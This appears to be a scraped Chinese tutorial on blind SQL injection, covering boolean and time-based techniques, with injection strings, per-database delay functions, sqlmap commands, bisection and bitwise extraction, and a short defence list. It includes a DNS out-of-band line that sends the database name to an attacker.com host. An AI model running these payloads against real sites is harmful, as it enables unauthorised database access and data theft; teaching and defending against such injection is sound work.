当前位置: 首页 > wzjs >正文

北京西站是高铁站吗信息发布网站有哪些

wzjs 2025/8/25 5:36:15
北京西站是高铁站吗,信息发布网站有哪些,中国建设部网站首页,app开发和网站开发一样么SQL注入之盲注技术详解 一、盲注基本概念盲注特点: 二、盲注主要类型1. 布尔盲注判断依据: 2. 时间盲注判断依据: 三、布尔盲注详细技术1. 识别布尔盲注2. 数据提取技术(1) 判断数据库类型(2) 获取数据库名长度(3) 逐字符获取数据库名(4) 获取…

SQL注入之盲注技术详解

  • 一、盲注基本概念
    • 盲注特点:
  • 二、盲注主要类型
    • 1. 布尔盲注
      • 判断依据:
    • 2. 时间盲注
      • 判断依据:
  • 三、布尔盲注详细技术
    • 1. 识别布尔盲注
    • 2. 数据提取技术
      • (1) 判断数据库类型
      • (2) 获取数据库名长度
      • (3) 逐字符获取数据库名
      • (4) 获取表名
      • (5) 自动化工具
  • 四、时间盲注详细技术
    • 1. 识别时间盲注
    • 2. 各数据库延时函数
    • 2. 数据提取技术
      • (1) 判断条件是否成立
      • (2) 逐位获取数据
      • (3) 使用case when语句
      • (4) 自动化工具
  • 五、盲注高级技巧
    • 1. 二分法加速盲注
    • 2. 位运算盲注
    • 3. DNS外带技术(OOB)
    • 4. 正则表达式盲注
  • 六、盲注防御措施

一、盲注基本概念

盲注(Blind SQL Injection)是一种特殊的SQL注入技术,当应用程序不会直接返回数据库错误信息或查询结果时使用。与常规注入不同,盲注需要通过应用程序的间接响应(如布尔状态、时间延迟)来推断数据。

盲注特点:

  • 无直接错误信息回显
  • 无查询结果直接显示
  • 需要通过逻辑判断或事件延迟获取数据
  • 攻击速度较慢但危害性相同

二、盲注主要类型

1. 布尔盲注

通过页面返回的真假状态判断SQL语句执行结果

判断依据:

  • 页面内容变化
  • http状态码变化
  • 返回数据长度变化

2. 时间盲注

通过数据库响应时间延迟判断SQL语句执行结果

判断依据:

  • 页面返回时间差异
  • 使用延时函数如sleep(),benchmark()

三、布尔盲注详细技术

1. 识别布尔盲注

测试语句:

id=1' and 1=1 --+  (返回正常页面)
id=1' and 1=2 --+  (返回异常或不同页面)

2. 数据提取技术

(1) 判断数据库类型

and (select count(*) from information_schema.tables)>0 -- MySQL
and (select count(*) from sysobjects)>0 -- SQL Server

(2) 获取数据库名长度

and length(database())=5 -- 判断当前数据库名长度是否为5

(3) 逐字符获取数据库名

and substr(database(),1,1)='a' -- 判断第一个字符是否为a
and ascii(substr(database(),1,1))=97 -- 判断第一个字符ASCII码是否为97(a)

(4) 获取表名

and (select count(*) from information_schema.tables where table_schema=database() and substr(table_name,1,1)='u')>0

(5) 自动化工具

使用sqlmap进行布尔盲注:

sqlmap -u "http://example.com/?id=1" --technique=B --dbs

四、时间盲注详细技术

1. 识别时间盲注

id=1' and sleep(5) --+  (观察响应是否延迟5秒)

2. 各数据库延时函数

数据库延时函数
MySQLSLEEP(5), BENCHMARK(1000000,MD5(1))
SQL ServerWAITFOR DELAY ‘0:0:5’
PostgreSQLpg_sleep(5)
OracleDBMS_LOCK.SLEEP(5)

2. 数据提取技术

(1) 判断条件是否成立

id=1' and if(ascii(substr(database(),1,1))=97,sleep(5),1) --+

(2) 逐位获取数据

id=1' and if((select ascii(substr(table_name,1,1)) from information_schema.tables where table_schema=database() limit 0,1)>100,sleep(5),1) --+

(3) 使用case when语句

id=1' and (case when (ascii(substr(database(),1,1))=97) then sleep(5) else 1 end) --+

(4) 自动化工具

使用sqlmap进行时间盲注:

sqlmap -u "http://example.com/?id=1" --technique=T --dbs

五、盲注高级技巧

1. 二分法加速盲注

and ascii(substr(database(),1,1))>128  -- 高位判断
and ascii(substr(database(),1,1))>64   -- 中位判断
and ascii(substr(database(),1,1))>96   -- 低位判断

2. 位运算盲注

and (ascii(substr(database(),1,1))>>1)&1=1  -- 判断第一位

3. DNS外带技术(OOB)

-- MySQL (需要load_file权限)
and (select load_file(concat('\\\\',(select database()),'.attacker.com\\share\\')))

4. 正则表达式盲注

and (select database()) regexp '^a'  -- 判断数据库名是否以a开头

六、盲注防御措施

  1. 使用预编译语句
  2. 输入验证:
    白名单验证
    类型强制转换
  3. 错误处理:
    同意错误页面
    不返回详细错误信息
  4. 权限控制:
    最小权限原则
    禁用危险函数
  5. WAF防护:
    识别并拦截盲注特征
    频率限制
http://www.dtcms.com/wzjs/477356.html

相关文章:

  • 购买了网站空间如何进入关键词推广和定向推广
  • 服装网站目标全媒体运营师报考官网在哪里
  • 做技术网站在背景图全媒体广告投放平台
  • 网络管理中心网站上海百度移动关键词排名优化
  • 一个主机建多少个网站网站建设制作过程
  • 做网站分为哪些功能的网站刷网站关键词工具
  • 网络销售公司产品推广方案搜索网站排名优化
  • 保定模板做网站seo诊断站长
  • 东莞哪家公司做网站好浙江百度推广
  • 网站域名供应商免费大数据查询
  • 西安手机网站制作公司百度数据研究中心
  • 外贸网站什么采集南宁网站关键词推广
  • 河南春辉建设集团官方网站免费二级域名注册网站
  • 温州做网站哪个好网页怎么做
  • wordpress 登录美化快速优化系统
  • 做内部网站cms周口seo推广
  • 网站建站的一般步骤佛山快速排名
  • 如何做竞价网站数据监控百度快照是怎么做上去的
  • 免费建.com的网站seo效果最好的是
  • 快速建站免费软仿长春seo网站排名
  • 专业做鞋子的网站有哪些福州网站建设方案外包
  • 网站兼容哪些浏览器网站seo标题是什么意思
  • 做dnf辅助网站微信crm
  • 哪个网站有免费空间seo排名优化推广
  • wordpress百家号插件aso优化榜单
  • 短视频网站怎么建设企业建站要多少钱
  • 站长推荐黄色下载百度到桌面
  • 网站运营品牌营销理论
  • 南通网站建设.seo网络推广优化
  • 韩国优秀平面设计网站有哪些网络营销推广方式包括哪几种